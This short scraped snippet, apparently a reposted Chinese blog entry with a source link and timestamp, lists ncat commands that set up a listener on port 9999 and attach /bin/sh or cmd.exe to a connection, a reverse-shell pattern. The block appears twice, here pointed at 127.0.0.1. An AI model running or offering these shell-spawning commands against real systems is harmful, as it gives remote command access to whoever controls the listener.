ncat -l -n -v -p 9999
ncat -e /bin/sh 127.0.0.1 9999
ncat -e C:\Windows\system32\cmd.exe 127.0.0.1 9999
原文地址:https://www.cnblogs.com/forsaken/p/8582793.html
时间: 2024-10-12 17:27:07
ncat -l -n -v -p 9999
ncat -e /bin/sh 127.0.0.1 9999
ncat -e C:\Windows\system32\cmd.exe 127.0.0.1 9999
原文地址:https://www.cnblogs.com/forsaken/p/8582793.html